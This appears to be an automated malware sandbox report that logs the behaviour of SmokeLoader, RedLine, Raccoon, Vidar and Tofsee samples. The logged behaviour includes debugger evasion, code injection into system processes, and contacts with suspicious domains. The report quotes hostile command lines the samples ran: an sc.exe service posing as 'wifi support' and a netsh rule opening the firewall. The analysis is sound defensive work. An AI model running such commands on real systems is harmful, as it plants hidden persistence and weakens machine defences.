                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_020D9D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_020D9BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe | System information queried: ModuleInformation

                      Anti Debugging:

                      Found API chain indicative of debugger detection
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe | Debugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleep
                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe | System information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Roaming\adiicvb | System information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe | System information queried: CodeIntegrityInformation
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe | Code function: 0_2_00409CAE LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe | Code function: 0_2_00530083 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe | Code function: 0_2_00540042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Roaming\adiicvb | Code function: 5_2_00600083 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Roaming\adiicvb | Code function: 5_2_00610042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe | Code function: 7_2_00470083 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe | Code function: 7_2_0048092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe | Code function: 7_2_00480D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_00401000 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_0040C180 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_020B0083 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_020D092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_020D1250 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_020D0D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_020DC3D0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe | Code function: 26_2_00540083 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe | Code function: 26_2_00D5092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe | Code function: 26_2_00D50D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\adiicvb | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe | Process queried: DebugPort
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe | Code function: 0_2_004037C4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe | Code function: 0_2_0040E300 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Memory protected: page guard
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe | Code function: 0_2_00408112 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe | Code function: 0_2_004071EC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_004037C4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_004033BB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: 11_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeCode function: 26_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\explorer.exeDomain query: github.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                      Source: C:\Windows\explorer.exeDomain query: raw.githubusercontent.com
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeDomain query: srtuiyhuali.at
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeDomain query: fufuiloirtu.com
                      Source: C:\Windows\explorer.exeDomain query: amogohuigotuli.at
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exeDomain query: bit.ly
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                      Source: C:\Windows\explorer.exeDomain query: goo.su
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeDomain query: a0620531.xsph.ru
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: privacytools-foryou-777.com
                      Source: C:\Windows\explorer.exeDomain query: softwaresworld.net
                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                      Source: C:\Windows\explorer.exeDomain query: unic11m.top
                      Benign windows process drops PE files
                      Source: C:\Windows\explorer.exeFile created: vsiicvb.3.dr
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Roaming\adiicvbSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\adiicvbSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Allocates memory in foreign processes
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 7E0000 protect: page execute and read and write
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeMemory written: C:\Users\user\Desktop\V91yW08J6p.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\adiicvbMemory written: C:\Users\user\AppData\Roaming\adiicvb base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeMemory written: C:\Users\user\AppData\Local\Temp\768F.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7E0000 value starts with: 4D5A
                      Contains functionality to inject code into remote processes
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00540110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeThread created: C:\Windows\explorer.exe EIP: 4F01930
                      Source: C:\Users\user\AppData\Roaming\adiicvbThread created: unknown EIP: 4F41930
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeThread created: unknown EIP: 5C91A40
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7E0000
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 81F008
                      .NET source code references suspicious native API functions
                      Source: 768F.exe.3.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 768F.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 13.0.768F.exe.2c0000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 13.0.768F.exe.2c0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 13.0.768F.exe.2c0000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 13.0.768F.exe.2c0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 13.2.768F.exe.2c0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 13.2.768F.exe.2c0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 13.0.768F.exe.2c0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 13.0.768F.exe.2c0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 23.0.768F.exe.360000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 23.0.768F.exe.360000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 23.0.768F.exe.360000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 23.0.768F.exe.360000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeProcess created: C:\Users\user\Desktop\V91yW08J6p.exe "C:\Users\user\Desktop\V91yW08J6p.exe"
                      Source: C:\Users\user\AppData\Roaming\adiicvbProcess created: C:\Users\user\AppData\Roaming\adiicvb C:\Users\user\AppData\Roaming\adiicvb
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ejdjvovs\
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe" C:\Windows\SysWOW64\ejdjvovs\
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ejdjvovs binPath= "C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d\"C:\Users\user\AppData\Local\Temp\6902.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ejdjvovs "wifi internet conection
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ejdjvovs
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess created: C:\Users\user\AppData\Local\Temp\768F.exe C:\Users\user\AppData\Local\Temp\768F.exe
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess created: C:\Users\user\AppData\Local\Temp\768F.exe C:\Users\user\AppData\Local\Temp\768F.exe
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: 11_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: 11_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                      Source: explorer.exe, 00000003.00000000.686439824.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.705495369.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.719849751.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
                      Source: explorer.exe, 00000003.00000000.686591277.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.705756557.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.720529892.0000000001080000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: explorer.exe, 00000003.00000000.689892257.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.686591277.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.705756557.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.720529892.0000000001080000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000003.00000000.686591277.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.705756557.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.720529892.0000000001080000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000003.00000000.686591277.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.705756557.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.720529892.0000000001080000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000003.00000000.712554316.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.694076028.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.728928584.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: __EH_prolog,OpenJobObjectA,GetLocaleInfoW,_ftell,_feof,_printf,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeQueries volume information: C:\Users\user\AppData\Local\Temp\768F.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00408796 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: 11_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00401313 __EH_prolog,CompareFileTime,TerminateThread,GetConsoleAliasesA,FindResourceExW,GetVersionExW,VirtualQuery,CreateRemoteThread,SetComputerNameExA,ClientToScreen,_printf,_malloc,_calloc,__wfopen_s,_fseek,__floor_pentium4,_puts,GetConsoleAliasA,GetModuleHandleA,GlobalAlloc,WriteConsoleA,GetConsoleTitleW,GetAtomNameW,HeapLock,GetFileAttributesW,GetDefaultCommConfigA,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      Uses netsh to modify the Windows network and firewall settings
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Modifies the windows firewall
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

                      Stealing of Sensitive Information:

                      Yara detected RedLine Stealer
                      Source: Yara matchFile source: 13.2.768F.exe.391ba90.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.768F.exe.37df910.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.768F.exe.391ba90.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.768F.exe.37df910.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001E.00000000.863779342.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.860675762.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.868605208.00000000036C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.863199052.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000003.915417310.00000000009D2000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.864291175.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.869195852.0000000003831000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.916450384.0000000000C18000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Yara detected SmokeLoader
                      Source: Yara matchFile source: 0.2.V91yW08J6p.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.adiicvb.6115a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.1.adiicvb.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.1.V91yW08J6p.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.V91yW08J6p.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.adiicvb.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.807939940.00000000005B0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.737039163.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.738316434.0000000002091000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.788360446.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.907355017.0000000002090000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.808518584.00000000021B1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.722834578.0000000004F01000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.907548459.00000000020C1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.788330206.0000000001F30000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Raccoon Stealer
                      Source: Yara matchFile source: 00000021.00000002.1065071680.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.885517058.0000000004950000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Vidar stealer
                      Source: Yara matchFile source: 00000008.00000002.809805582.0000000000548000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1068850815.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.909618696.0000000002370000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Tofsee
                      Source: Yara matchFile source: 11.2.6902.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.3.qxoxlxqh.exe.d70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.6902.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.3.6902.exe.600000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.db0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.db0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.6902.exe.5e0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.d50e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000003.814707254.0000000000600000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.840468381.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.850016785.0000000000400000.00000040.00020000.sdmp, type: MEMORY
